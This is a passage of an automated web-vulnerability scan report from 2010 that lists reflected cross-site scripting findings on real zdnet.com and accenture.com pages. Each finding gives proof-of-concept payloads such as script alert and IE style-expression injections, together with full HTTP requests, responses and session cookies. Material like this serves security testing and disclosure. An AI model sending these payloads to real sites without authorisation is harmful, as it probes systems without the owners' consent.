Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 35936"><a>f54325b105e
The value of the RD_PARM1 request parameter is copied into the HTML document as plain text between tags. The payload 125ee<script>alert(1)</script>f5c10ca5f21 was submitted in the RD_PARM1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=8125ee<script>a ...[SNIP]... </script>f5c10ca5f21&partnerId=30&siteID=_1Vwg7V501c-f8M8zQME2vXMhD6yByqk6w">http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=8125ee<script>alert(1)</script>f5c10ca5f21&partnerId=30&siteID=_1Vwg7V501c-f8M8zQME2vXMhD6yByqk6w</a> ...[SNIP]...
The value of the RD_PARM1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca0f"><script>alert(1)</script>6d0a59a02a6 was submitted in the RD_PARM1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=83ca0f"><script>alert(1)</script>6d0a59a02a6&partnerId=30&siteID=_1Vwg7V501c-ggnz2nJwI33fdVpABGq_dQ"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb2ff'style%3d'x%3aexpression(alert(1))'3c988d977d0 was submitted in the REST URL parameter 3. This input was echoed as fb2ff'style='x:expression(alert(1))'3c988d977d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Location: https://www.accenture.com/Accenture/Registration/EAN.aspxfb2ff'style='x:expression(alert(1))'3c988d977d0 Content-Type: text/html; charset=utf-8 Content-Length: 221 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 16:48:02 GMT Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:01 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='https://www.accenture.com/Accenture/Registration/EAN.aspxfb2ff'style='x:expression(alert(1))'3c988d977d0'>here</a>.</ ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4ae7d'style%3d'x%3aexpression(alert(1))'5890a800d50 was submitted in the REST URL parameter 3. This input was echoed as 4ae7d'style='x:expression(alert(1))'5890a800d50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Accenture/Registration/LoginPage.aspx4ae7d'style%3d'x%3aexpression(alert(1))'5890a800d50 HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Location: https://www.accenture.com/Accenture/Registration/LoginPage.aspx4ae7d'style='x:expression(alert(1))'5890a800d50 Content-Type: text/html; charset=utf-8 Content-Length: 227 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 16:47:55 GMT Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:55 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='https://www.accenture.com/Accenture/Registration/LoginPage.aspx4ae7d'style='x:expression(alert(1))'5890a800d50'>here< ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2da4c'%20a%3db%2018a8563620b was submitted in the REST URL parameter 1. This input was echoed as 2da4c' a=b 18a8563620b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Accenture2da4c'%20a%3db%2018a8563620b/Registration/SignOutPage.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture2da4c' a=b 18a8563620b/Registration/SignOutPage.aspx Content-Type: text/html; charset=utf-8 Content-Length: 225 Vary: Accept-Encoding Cache-Control: private, max-age=43200 Date: Sun, 21 Nov 2010 16:48:05 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture2da4c' a=b 18a8563620b/Registration/SignOutPage.aspx'>here</a ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8f2e'%20a%3db%20588b8c9f4f1 was submitted in the REST URL parameter 2. This input was echoed as a8f2e' a=b 588b8c9f4f1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Accenture/Registrationa8f2e'%20a%3db%20588b8c9f4f1/SignOutPage.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Pragma: no-cache Location: http://www.accenture.com/Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture/Registrationa8f2e' a=b 588b8c9f4f1/SignOutPage.aspx Pragma: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 249 Vary: Accept-Encoding Cache-Control: no-cache Expires: Sun, 21 Nov 2010 16:48:11 GMT Date: Sun, 21 Nov 2010 16:48:11 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='http://www.accenture.com/Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture/Registrationa8f2e' a=b 588b8c9f4f1/SignOutPage.aspx'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c620b'style%3d'x%3aexpression(alert(1))'749a846ac09 was submitted in the REST URL parameter 3. This input was echoed as c620b'style='x:expression(alert(1))'749a846ac09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Accenture/Registration/SignOutPage.aspxc620b'style%3d'x%3aexpression(alert(1))'749a846ac09 HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Location: https://www.accenture.com/Accenture/Registration/SignOutPage.aspxc620b'style='x:expression(alert(1))'749a846ac09 Content-Type: text/html; charset=utf-8 Content-Length: 229 Date: Sun, 21 Nov 2010 16:48:14 GMT Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:14 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='https://www.accenture.com/Accenture/Registration/SignOutPage.aspxc620b'style='x:expression(alert(1))'749a846ac09'>her ...[SNIP]...
Report generated by Hoyt LLC Research
at Mon Nov 22 17:39:18 CST 2010.